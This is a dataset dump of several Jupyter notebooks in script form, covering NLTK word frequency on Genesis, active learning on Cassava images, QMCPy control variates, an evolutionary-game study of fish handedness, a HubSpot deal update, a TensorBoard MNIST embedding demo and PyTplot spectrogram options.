code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Counting words
#
# ## Frequency
# The frequency of a word in a text and/or its unusual size can tell a lot about the text.
#
# In this jupyter notebook, I discuss some counting techniques.
#Importing libs
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import nltk
#Calling the texts
from nltk.book import *
# # Counting words
#Counting the amount of word in Genesis
len(text3)
#Print each word of Genesis
print(set(text3))
#Sorting the words in alphabetical order
print(sorted(set(text3)))
#print the number of distinct words of Genesis
len(set(text3))
# We can calculate the number of times that a word is used in a text.
len(text3)/len(set(text3)) #total number of words of the text divided by total number of distinct words of the text
# On average, a word of that text is used about 16 times.
# Perhaps, our interest is in knowing the percentage of the presence of a word in a text.
#Counting word God
text3.count('God')
#Counting word Abraham
text3.count('Abraham')
#Calculating the percentage of the presence of the word God in the text
round((text3.count('God')/len(text3)) * 100, 2)
#Calculating the percentage of the presence of the word God in the text
round((text3.count('Abraham')/len(text3)) * 100, 2)
# As you can see, the word God appears more times than word Abraham. However, both appear less than 1%.
# ### Defining a function to calculate lexical diversity on average and percentage of a word in a text
# An interesting observation is about the lexical diversity of a text. It indicates how rich a text is lexically. We can have on hand a large text but with vocabulary poverty or short text but with vocabulary richness.
#
# Below I initially developed two function to measure that richness. The first function measures how many times on average a word appears in the text. The second function measures how many the text is diversified. The higher the percentage is, the richer lexically is, that is, the closer to 100%.
#Defining lexical diversity function
def lexical_diversity(text):
return print('On average, a word appears {} times in the text.'.format(round(len(text)/len(set(text)), 2)))
#It returns the gross number of words used on average
#Defining percentage of lexical diversity function
def lexical_diversity_rate(text):
return print('The lexical diversity is in {}%.'.format(round((len(set(text))/len(text))*100, 2)))
#Testing lexical diversity function
lexical_diversity(text3)
#Testing lexical diversity text
lexical_diversity_rate(text3)
# To define effectively whether a text has low or high lexical diversity, it is not just observe the rate, howerver, it is necessary to study other texts are of the same class in order to understand the patterns of that text type.
# You can seek the presence rate of a word in a text through the function below.
#Building word presence rate function in the text
def word_presence_rate_in_the_text(text, word):
return print('The presence rate of this word is about {}%.'.format(round((text.count(word)/len(text))*100, 4)))
#Testing word presence rate function
word_presence_rate_in_the_text(text3, 'God')
#Testing the function on list
test_list = ['Hello', '!', 'My', 'names', 'is', 'Bruno', '.']
lexical_diversity(test_list) #Applying lexical diversity function
lexical_diversity_rate(test_list) #Applying lexical diversity rate function
word_presence_rate_in_the_text(test_list, 'names') #Word presence rate function
len(test_list) #Seeking for total number of words in the list
# # Picking up what makes a text distinct
# ## Frequency distribution
# The methods below work on the words frequencies.
#
# FreqDist( ) is a method that creates a dictionary where the characters are the keys and their frequencies in text are the values.
#Searching the 50 most frequent words in the book of Genesis
most_freq_words3 = FreqDist(text3)
most_freq_words3
# To access the values/frequencies, just use the values().
#Showing the frequency of each word
most_freq_words3.values()
# keys( ) shows the keys/words.
#Printing the keys
keys_of_most_freq_words3 = most_freq_words3.keys()
keys_of_most_freq_words3
# Both keys( ) and values( ) work with FreqDist( ).
# There are very informative words that appear once in a text. Those words are called hapaxes. Below are returned those that are in the book of Genesis. Note that "Night" appears once in Genesis. It is probably beacause "Night" is spelled with capitalized "n".
#Printing words appears once time
print(most_freq_words3.hapaxes())
#Printing the number of hapaxes
len(most_freq_words3.hapaxes())
# # Fine-grained selection of words
# Another good possibility is to know the main content of the text by its long words. Long words can be kind of rare and can convey important informations about the content of a text.
#
# For that, observe this mathematical notation:
#
# P: words that have more than 14 characters;
#
# P(w) is true if and only if w is more than 14 characters long;
#
# V: Vocabulary;
#
# a. {w | w E V & P(w)}
#
# b. [w for w in V if P(w)]
# Applying that mathematical notation, the words below are returned.
#Oparating the notation
V = set(text3) #Storing distinct words of the book of Genesis
expected_long_words = [w for w in V if len(w) > 9] #Storting words that have more than 10 characters
print(sorted(expected_long_words)) #Sorting the derived list
# those words features in parts the book of Genesis. Note some words:
#
# circumcised, commanding, commandment, commandments, concubines, generation, generations, habitations, imagination, inhabitants, interpretation, interpretations, interpreted, interpreter and pilgrimage.
#
# They are words with a relationship degree.
#Number of words derived from original text
len((sorted(expected_long_words)))
# According to returned above, the number of long words that meet the criterion is 139.
# Looking for large words is not always enough. Adding frequency to that criterion can be a good method of chategorizing text.
freqdist = FreqDist(text3) #Defining a dictionary where the words are keys and the values are their frequencies
print(sorted([w for w in V if len(w) > 4 and freqdist[w] > 16]))
#Variable w gets V if and only if number of characters of w is more than 4 and its frequency is more than 16
# That instruction returns many people's names, nations, ethnicities, some foods and drinks, time.
|
02_NLTK-counting_words.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/ravindrabharathi/fsdl-active-learning2/blob/main/notebooks/test_active_learning_Cassava_least_confidence_no_dropout.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + colab={"base_uri": "https://localhost:8080/"} id="DoWvbjJa3e53" outputId="dcb6f0aa-5cbc-4f5a-cd68-f97a5e05c4b9"
# !git clone --single-branch --branch cassava-deepweeds https://github.com/ravindrabharathi/fsdl-active-learning2.git
# + colab={"base_uri": "https://localhost:8080/"} id="PVuDwtl8t_Ew" outputId="e20dcd78-8c89-4737-b5f0-27fbe27777c9"
# %cd fsdl-active-learning2
# + colab={"base_uri": "https://localhost:8080/"} id="CZ4k36MGtb-K" outputId="cfbf0d60-adc0-4519-8b73-2fbea8e79380"
from google.colab import drive
drive.mount('/gdrive')
# + id="vJTqhmEStdHd"
# !mkdir './data/cassava/'
# + id="5BRIry8pt4Gb"
# !cp '/gdrive/MyDrive/cassava-kaggle/train_images.zip' './data/cassava/'
# !cp '/gdrive/MyDrive/cassava-kaggle/train.csv' './data/cassava/'
# + id="f0Lj5k0Kkjs9"
# !unzip -q './data/cassava/train_images.zip' -d './data/cassava/images'
# + id="ds7QXOu5imsW"
# alternative way: if you cloned the repository to your GDrive account, you can mount it here
#from google.colab import drive
#drive.mount('/content/drive', force_remount=True)
# #%cd /content/drive/MyDrive/fsdl-active-learning
# + colab={"base_uri": "https://localhost:8080/"} id="1bX8zIz-i2pJ" outputId="0f26ee8e-5e3d-4461-b301-d2bd7a6e8d44"
# !pip3 install PyYAML==5.3.1
# !pip3 install boltons wandb pytorch_lightning==1.2.8
# !pip3 install torch==1.7.1+cu110 torchvision==0.8.2+cu110 torchaudio==0.7.2 torchtext==0.8.1 -f https://download.pytorch.org/whl/torch_stable.html # general lab / pytorch installs
# !pip3 install modAL tensorflow # active learning project
# !pip install hdbscan
# %env PYTHONPATH=.:$PYTHONPATH
# + id="mw7Tcp8Qiw9h" colab={"base_uri": "https://localhost:8080/"} outputId="b90dfdf0-2a9b-43f7-ab1a-8548ec39794b"
# #!python training/run_experiment.py --wandb --gpus=1 --max_epochs=1 --num_workers=4 --data_class=DroughtWatch --model_class=ResnetClassifier --batch_size=32 --sampling_method="random"
# !python training/run_experiment.py --gpus=1 --max_epochs=10 --num_workers=4 --data_class=CassavaDataModule --model_class=ResnetClassifier2 --sampling_method="least_confidence" --batch_size=256
|
notebooks/test_active_learning_Cassava_least_confidence_no_dropout.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="wyIC-fSKUcL7"
# # Control Variates in QMCPy
#
# This notebook demonstrates QMCPy's current support for control variates.
# + [markdown] id="v_CDThSJUpUz"
# ## Setup
# + id="vxpOFASNPuHw"
from qmcpy import *
from numpy import *
from qmcpy import *
from numpy import *
# + id="cf7vhLKZgK6Z"
from matplotlib import pyplot
# %matplotlib inline
size = 20
pyplot.rc('font', size=size) # controls default text sizes
pyplot.rc('axes', titlesize=size) # fontsize of the axes title
pyplot.rc('axes', labelsize=size) # fontsize of the x and y labels
pyplot.rc('xtick', labelsize=size) # fontsize of the tick labels
pyplot.rc('ytick', labelsize=size) # fontsize of the tick labels
pyplot.rc('legend', fontsize=size) # legend fontsize
pyplot.rc('figure', titlesize=size) # fontsize of the figure title
# + id="gP5vClqmCuE4"
def compare(problem,discrete_distrib,stopping_crit,abs_tol):
g1,cvs,cvmus = problem(discrete_distrib)
sc1 = stopping_crit(g1,abs_tol=abs_tol)
name = type(sc1).__name__
print('Stopping Criterion: %-15s absolute tolerance: %-5.1e'%(name,abs_tol))
sol,data = sc1.integrate()
print('\tW CV: Solution %-10.2f time %-10.2f samples %.1e'%(sol,data.time_integrate,data.n_total))
sc1 = stopping_crit(g1,abs_tol=abs_tol,control_variates=cvs,control_variate_means=cvmus)
solcv,datacv = sc1.integrate()
print('\tWO CV: Solution %-10.2f time %-10.2f samples %.1e'%(solcv,datacv.time_integrate,datacv.n_total))
print('\tControl variates took %.1f%% the time and %.1f%% the samples\n'%\
(100*datacv.time_integrate/data.time_integrate,100*datacv.n_total/data.n_total))
# + [markdown] id="x-wXHvDxvHAI"
# ## Problem 1: Polynomial Function
#
# We will integrate
# $$g(t) = 10t_1-5t_2^2+2t_3^3$$
# with true measure $\mathcal{U}[0,2]^3$ and control variates
# $$\hat{g}_1(t) = t_1$$
# and
# $$\hat{g}_2(t) = t_2^2$$
# using the same true measure.
# + colab={"base_uri": "https://localhost:8080/"} id="Z6iwKN8dvHVS" outputId="7264eefb-20ed-4e23-cb87-e996d89fd843"
# parameters
def poly_problem(discrete_distrib):
g1 = CustomFun(Uniform(discrete_distrib,0,2),lambda t: 10*t[:,0]-5*t[:,1]**2+t[:,2]**3)
cv1 = CustomFun(Uniform(discrete_distrib,0,2),lambda t: t[:,0])
cv2 = CustomFun(Uniform(discrete_distrib,0,2),lambda t: t[:,1]**2)
return g1,[cv1,cv2],[1,4/3]
compare(poly_problem,IIDStdUniform(3,seed=7),CubMCCLT,abs_tol=1e-2)
compare(poly_problem,IIDStdUniform(3,seed=7),CubMCCLT,abs_tol=1e-2)
compare(poly_problem,Sobol(3,seed=7),CubQMCSobolG,abs_tol=1e-8)
# + [markdown] id="YCC364nrUxcY"
# ## Problem 2: Keister Function
#
# This problem will integrate the Keister function while using control variates
# $$g_1(x) = \sin(\pi x)$$
# and
# $$g_2(x) = -3(x-1/2)^2+1.$$
# The following code does this problem in 1 dimension for visualization purposes, but control variates are compatible with any dimension.
# + colab={"base_uri": "https://localhost:8080/"} id="c0oAxLqrFWHk" outputId="5f007bde-14cc-41ff-a880-990dc7e97ecf"
def keister_problem(discrete_distrib):
k = Keister(discrete_distrib)
cv1 = CustomFun(Uniform(discrete_distrib),lambda x: sin(pi*x).sum(1))
cv2 = CustomFun(Uniform(discrete_distrib),lambda x: (-3*(x-.5)**2+1).sum(1))
return k,[cv1,cv2],[2/pi,3/4]
compare(keister_problem,IIDStdUniform(1,seed=7),CubMCCLT,abs_tol=5e-4)
compare(keister_problem,IIDStdUniform(1,seed=7),CubMCCLT,abs_tol=4e-4)
compare(keister_problem,Sobol(1,seed=7),CubQMCSobolG,abs_tol=1e-7)
# + [markdown] id="8j9OEXmmWSPe"
# ## Problem 3: Option Pricing
#
# We will use a European Call Option as a control variate for pricing the Asian Call Option using various stopping criterion, as done for problem 1
# + colab={"base_uri": "https://localhost:8080/"} id="vSojYYnMGEQY" outputId="f3d8a4d0-bb7f-4a95-ff3e-6bb64c8c9b49"
call_put = 'call'
start_price = 100
strike_price = 125
volatility = .75
interest_rate = .01 # 1% interest
t_final = 1 # 1 year
def option_problem(discrete_distrib):
eurocv = EuropeanOption(discrete_distrib,volatility,start_price,strike_price,interest_rate,t_final,call_put)
aco = AsianOption(discrete_distrib,volatility,start_price,strike_price,interest_rate,t_final,call_put)
mu_eurocv = eurocv.get_exact_value()
return aco,[eurocv],[mu_eurocv]
compare(option_problem,IIDStdUniform(4,seed=7),CubMCCLT,abs_tol=5e-2)
compare(option_problem,IIDStdUniform(4,seed=7),CubMCCLT,abs_tol=5e-2)
compare(option_problem,Sobol(4,seed=7),CubQMCSobolG,abs_tol=1e-3)
|
demos/control_variates.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 魚の利き手
# ## Abstract
# ### タンガニーカ湖での調査のように、魚には利き手(口の向き(利き口?))があることが知られている。本実験は空間上の進化ゲームを通じて集団としての利き手の偏りの推移を調べたものである。
# ## Model
# 魚には魚食魚と被食魚の二種類が存在すると仮定する。ここで魚食魚は魚食魚を捕食しないとも仮定する。被食魚は確率P=(右利きの総数)/(全体数)で右利きに注意を払い、確率1-Pで左利きに注意を払うものとする。したがって、どちらかの利き口が多ければ少数派を選択することで自らの利得を向上させることができる。このため、最終的には右利き左利きが半々の位置でゆらぐことが考えられるが、タンザニーカ湖での調査によると右利き過多左利き過多の時期を繰り返している。これはどうしてであろうか。本実験はグラフ上のゲームを考えることでその仕組みを説明する。「情報」の伝達に
#
# +
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def func(x, t, a, b, c, d):
return [x[0]*(1-x[0])*((a*(1-x[1])-b-c+d*(1-x[1]))*x[0]+b-d), x[1]*(1-x[1])*((a-b-c+d)*x[1]+b-d)]
a = 0.0
b = 0.2
c = -0.2
d = 0.0
x0 = [0.1, 0.1]
t = np.arange(0, 100, 0.01)
x = odeint(func, x0, t, args=(a, b, c, d))
plt.plot(x)
# +
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def func(v, t, p, r, b):
return [-p*v[0]*v[0]+p*v[1], -v[0]*v[2]+r*v[0]-v[1], v[0]*v[1]-b*v[2]]
p = 10
r = 28
b = 8/3
v0 = [0.1, 0.1, 0.1]
t = np.arange(0, 100, 0.01)
v = odeint(func, v0, t, args=(p, r, b))
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot(v[:, 0], v[:, 1], v[:, 2])
# plt.show()
# -
|
handedness_of_fish.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# <img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/>
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# # HubSpot - Update deal
# <a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/HubSpot/HubSpot_Update_deal.ipynb" target="_parent"><img src="https://naasai-public.s3.eu-west-3.amazonaws.com/open_in_naas.svg"/></a>
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# **Tags:** #hubspot #crm #sales #deal #naas_drivers #snippet
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# **Author:** [<NAME>](https://www.linkedin.com/in/florent-ravenel/)
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ## Input
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Import library
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
from naas_drivers import hubspot
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Setup your HubSpot
# 👉 Access your [HubSpot API key](https://knowledge.hubspot.com/integrations/how-do-i-get-my-hubspot-api-key)
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
HS_API_KEY = 'YOUR_HUBSPOT_API_KEY'
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Enter deal parameters to update
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal_id = "3501002068"
dealname = "TEST"
dealstage = '5102584'
closedate = '2021-12-31' #date format must be %Y-%m-%d
amount = '100.50'
hubspot_owner_id = None
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ## Model
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### With patch method
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
update_deal = {"properties":
{
"dealstage": dealstage,
"dealname": dealname,
"amount": amount,
"closedate": closedate,
"hubspot_owner_id": hubspot_owner_id,
}
}
deal1 = hubspot.connect(HS_API_KEY).deals.patch(deal_id,
update_deal)
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### With update method
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal2 = hubspot.connect(HS_API_KEY).deals.update(
deal_id,
dealname,
dealstage,
closedate,
amount,
hubspot_owner_id
)
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ## Output
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Display results
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal1
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal2
|
HubSpot/HubSpot_Update_deal.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Credits
# Code adapted from: https://github.com/decentralion/tf-dev-summit-tensorboard-tutorial/blob/master/mnist.py
# # Tf.summary
# Module tf.summary containts tensorflow operators that output "summary" protocolbuffer format
# Examples:
# tf.summary.scalar
# tf.summary.image
# tf.summary.audio
# +
import os
import os.path
import shutil
import tensorflow as tf
LOGDIR = "./mnist_demo/"
### MNIST EMBEDDINGS ###
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets(train_dir=LOGDIR + "data", one_hot=True)
# -
LABELS = os.path.join(os.getcwd(), "labels_1024.tsv")
SPRITES = os.path.join(os.getcwd(), "sprite_1024.png")
# +
def conv_layer(input, size_in, size_out, name='conv'):
with tf.name_scope(name):
#w = tf.Variable(tf.zeros([5, 5, size_in, size_out]), name='W')
w = tf.Variable(tf.truncated_normal([5, 5, size_in, size_out], stddev=0.1), name="W")
#b = tf.Variable(tf.zeros([size_out]), name='B')
b = tf.Variable(tf.constant(0.1, shape=[size_out]), name="B")
conv = tf.nn.conv2d(input, w, strides=[1, 1, 1, 1], padding="SAME")
act = tf.nn.relu(conv + b)
tf.summary.histogram("weights", w)
tf.summary.histogram("biases", b)
tf.summary.histogram("activations", act)
return tf.nn.max_pool(act, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME")
def fc_layer(input, size_in, size_out, name='fc'):
with tf.name_scope(name):
# w = tf.Variable(tf.zeros([size_in, size_out]), name='W')
w = tf.Variable(tf.truncated_normal([size_in, size_out], stddev=0.1), name="W")
# b = tf.Variable(tf.zeros([size_out]), name='B')
b = tf.Variable(tf.constant(0.1, shape=[size_out]), name="B")
act = tf.matmul(input, w) + b
tf.summary.histogram("weights", w)
tf.summary.histogram("biases", b)
tf.summary.histogram("activations", act)
return act
# -
def mnist_model(learning_rate):
tf.reset_default_graph()
sess = tf.Session()
# Setup placeholders, and reshape the data
x = tf.placeholder(tf.float32, shape=[None, 784], name="x")
y = tf.placeholder(tf.float32, shape=[None, 10], name="labels")
x_image = tf.reshape(x, [-1, 28, 28, 1])
tf.summary.image('input', x_image, 3)
# create the network
# first convec layer
conv1 = conv_layer(x_image, 1, 32, "conv1")
# second convec layer
conv_out = conv_layer(conv1, 32, 64, "conv2")
flattened = tf.reshape(conv_out, [-1, 7 * 7 * 64])
#################
embedding_input = flattened
#################
# embedding_size = 7 * 7 * 64
fc1 = fc_layer(flattened, 7 * 7 * 64, 1024, 'fc1')
logits = fc_layer(fc1, 1024, 10, 'fc2')
#compute cross entropy as our loss function
with tf.name_scope("xent"):
xent = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
logits=logits, labels=y))
tf.summary.scalar("xent", xent)
# use and AdapOptimizer to train the network
with tf.name_scope("train"):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(xent)
# compute the accuracy
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar("accuracy", accuracy)
# Initialize all the variables
sess.run(tf.global_variables_initializer())
merged_summary = tf.summary.merge_all()
writer = tf.summary.FileWriter(LOGDIR + "5-embedding-visualizer")
writer.add_graph(sess.graph)
#############
embedding = tf.Variable(tf.zeros([1024, 7*7*64]), name="test_embedding")
assignment = embedding.assign(embedding_input)
saver = tf.train.Saver()
config = tf.contrib.tensorboard.plugins.projector.ProjectorConfig()
embedding_config = config.embeddings.add()
embedding_config.tensor_name = embedding.name
embedding_config.sprite.image_path = SPRITES
embedding_config.metadata_path = LABELS
# Specify the width and height of a single thumbnail.
embedding_config.sprite.single_image_dim.extend([28, 28])
tf.contrib.tensorboard.plugins.projector.visualize_embeddings(writer, config)
# Train for 1000 steps
for i in range(1000):
batch = mnist.train.next_batch(100)
# Occasionally report accuracy
if i % 50 == 0:
[train_accuracy, s] = sess.run([accuracy, merged_summary], feed_dict={x: batch[0], y: batch[1]})
writer.add_summary(s, i)
print("step %d, training accuracy %g" % (i, train_accuracy))
###############
# Occationally calculate embedding for the test dataset
sess.run(assignment, feed_dict={x: mnist.test.images[:1024], y: mnist.test.labels[:1024]})
saver.save(sess, os.path.join(LOGDIR, "model.ckpt"), i)
# Run the training step
sess.run(train_step, feed_dict={x: batch[0], y: batch[1]})
mnist_model(1e-4)
#
# ## Let visualize the Tensorflow graph
# tensorboard --logdir ./mnist_demo/5-embedding-visualizer
|
notebook/TFAML_L5_Tensorboard_demo/mnist_v5 - embedding visualizer.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="_PzHTGSIYdZS"
# # PyTplot spectrogram options
#
# This notebook shows how to create and work with spectrograms in PyTplot
#
# Originally created at the 2022 PyHC Spring Meeting Hackathon
# + id="eJ6cGCpw-IaE"
# !pip install https://github.com/MAVENSDC/PyTplot/archive/matplotlib-backend.zip
# + id="aA2EZwEn-QS8"
import numpy as np
# + id="A63NgE4S-tr0"
from pytplot import store_data, options, tplot
# + [markdown] id="KZTsloPhVvUo"
# Create a simple spectrogram variable
# + id="ACbSfMIH-vd4"
data = np.array([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9],
[10, 11, 12, 13, 14],
[15, 16, 17, 18, 19],
[20, 21, 22, 23, 24]])
# + [markdown] id="VHNcrjDtV0t4"
# Note: spectrogram variables should have the `v` option set in the data dictionary, with the y-axis values for the spectra
# + colab={"base_uri": "https://localhost:8080/"} id="-amcqj8O-whi" outputId="ee7012a0-1bb8-4151-ddc8-943f51bbfc90"
store_data('data', data={'x': [1, 2, 3, 4, 5], 'y': data.transpose(), 'v': [10, 20, 30, 40, 50]})
# + [markdown] id="Vi6VkXRMWBMy"
# By default, it'll still show up as a line plot
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="sItBNG57-12B" outputId="babefd51-04b2-4c22-a7c6-9ae97a039c14"
tplot('data')
# + [markdown] id="BK0sIygTWEgw"
# Set the `spec` option to turn it into a spectrogram
# + id="Fuodk5kK-23u"
options('data', 'spec', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="fx0rklDm-6Ek" outputId="7b9af8cc-3778-442a-aa54-38181b7a88b1"
tplot('data')
# + [markdown] id="ew4qLvs1WHqL"
# Update the y-axis range
# + id="Q_IG-dUp-6o3"
options('data', 'yrange', [15, 45])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="WCWbPlXO_Ho5" outputId="4d39a8cf-ca1f-41fb-a4a2-a335f08d3663"
tplot('data')
# + [markdown] id="oVt9sf3IWLIT"
# Change the y-axis range back
# + id="AuoyVz4c_IG5"
options('data', 'yrange', [10, 50])
# + [markdown] id="7bXLBUUdWMz_"
# Update the color bar range
# + id="QHlw8rPo_MG-"
options('data', 'zrange', [5, 20])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="rC82yrf3_Qfj" outputId="535bd5a2-66b4-49db-8865-08b6d8602b42"
tplot('data')
# + [markdown] id="-13PCYCKWPZD"
# Change the color bar range back
# + id="1azX4_9Y_Q-U"
options('data', 'zrange', [0, 24])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="aHKnuyPm_WwG" outputId="cee0b025-cb0f-42c0-c26a-9bf8780c6d2a"
tplot('data')
# + [markdown] id="GkqUYw0eWR0C"
# Change the color bar
#
# Note: this should support all of the colormaps available in matplotlib, see:
#
# https://matplotlib.org/3.5.0/tutorials/colors/colormaps.html
#
# for a list
# + id="grPtekb0_XMz"
options('data', 'Colormap', 'plasma')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="g54kZw_U_gwU" outputId="04d8a50f-b21a-467a-b028-8457e256de5b"
tplot('data')
# + [markdown] id="iNYQ4iBUWewa"
# In addition to the matplotlib colormaps, we also support the `spedas` color bar (the same one as in IDL SPEDAS). The `spedas` colormap is the default
# + id="5LcDRo7y_hPW"
options('data', 'Colormap', 'spedas')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="irquvNRn_mQb" outputId="cef88205-48c4-4f0c-ead0-ddc22ac4c2b8"
tplot('data')
# + [markdown] id="JFl0hctvWnvf"
# To automatically interpolate in the x-direction, use the `x_interp` option
# + id="zUA49iQj_mxJ"
options('data', 'x_interp', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="ssKfD-B__rxP" outputId="8294a0a4-6dca-4d81-f175-9e9e069aa41d"
tplot('data')
# + [markdown] id="pySQKjb6WtOt"
# To automatically interpolate in the y-direction, turn off x-interpolation and turn on y-interpolation:
# + id="ySw5030k_tHL"
options('data', 'x_interp', False)
options('data', 'y_interp', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="RtYex9rr_zXC" outputId="c3ac9b50-eb84-477e-c1fb-4b4fa6c045e7"
tplot('data')
# + [markdown] id="q1-qP3iMWzN6"
# Turn interpolation on in both the x and y directions
# + id="vSsB4f4L_z6q"
options('data', 'x_interp', True)
options('data', 'y_interp', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="wjqg9JoA_2lL" outputId="9a7e5366-7b5d-49d1-e96b-a2e375621fea"
tplot('data')
# + [markdown] id="xJWy2dNyW5WJ"
# Change the number of data points in the interpolation in the x-direction
# + id="6yUBL5Ip_3M_"
options('data', 'x_interp_points', 10)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="fnDI5MFAAA1U" outputId="f59faf35-c92f-4dbd-c795-848f4a9bc4ff"
tplot('data')
# + [markdown] id="IgM-gqNGW-m4"
# Change the number of data points in the y-direction
# + id="pJiHAZZnABW_"
options('data', 'y_interp_points', 10)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="8s5zry59AE_7" outputId="145a624a-4f61-4cd8-fee8-6ef047d687c2"
tplot('data')
# + [markdown] id="n8DpEaD8XEiT"
# Turn the y-axis to log scale
# + id="a1pL682OAF9i"
options('data', 'ylog', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="tXSPEXR8ARWD" outputId="b73e7a23-8e09-4756-ea3e-74fe8dd927b7"
tplot('data')
# + [markdown] id="2TeJ0vzDXPbF"
# Set the z-axis to a log scale
